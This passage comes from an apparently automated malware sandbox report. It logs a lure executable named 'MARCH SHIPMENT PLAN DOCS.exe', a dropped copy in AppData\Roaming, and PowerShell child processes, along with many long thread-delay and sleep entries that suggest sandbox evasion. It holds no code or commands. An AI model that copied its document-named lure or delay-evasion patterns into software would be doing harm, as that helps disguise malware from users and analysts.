              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 2C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeMemory allocated: 4C80000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598219Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597781Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597672Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597451Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597344Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597016Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596766Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596543Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596436Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595766Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595641Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594766Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594641Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599891
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599779
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599666
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599547
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599435
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599328
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599219
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599109
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 599000
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598891
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598781
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598671
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598562
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598453
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598342
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598234
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598125
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 598015
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597905
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597797
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597687
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597578
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597469
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597359
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597250
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597141
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 597030
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596922
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596812
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596703
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596594
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596469
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596359
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596250
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596140
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 596031
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595922
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595804
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595687
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595578
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595469
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595344
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595234
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595125
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 595015
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594906
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594797
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594687
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeThread delayed: delay time: 594578
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5904Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8496Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeWindow / User API: threadDelayed 1493Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeWindow / User API: threadDelayed 8361Jump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeWindow / User API: threadDelayed 1603
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeWindow / User API: threadDelayed 8256
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 5368Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3592Thread sleep count: 5904 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 147 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -26747778906878833s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8100Thread sleep count: 1493 > 30Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8100Thread sleep count: 8361 > 30Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599563s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -598000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597451s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -597016s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596543s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596436s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -596000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595891s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -595094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -594984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -594875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -594766s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -594641s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe TID: 8096Thread sleep time: -594516s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 7408Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -27670116110564310s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -600000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599891s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 6776Thread sleep count: 1603 > 30
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 6776Thread sleep count: 8256 > 30
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599779s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599666s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599547s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599435s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599328s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599219s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599109s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -599000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598891s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598781s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598671s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598562s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598453s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598342s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598234s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598125s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -598015s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597905s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597797s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597687s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597578s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597469s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597359s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597250s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597141s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -597030s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596922s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596812s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596703s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596594s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596469s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596359s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596250s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596140s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -596031s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595922s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595804s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595687s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595578s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595469s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595344s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595234s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595125s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -595015s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -594906s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -594797s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -594687s >= -30000s
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exe TID: 5428Thread sleep time: -594578s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598219Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeThread delayed: delay time: 597891Jump to behavior
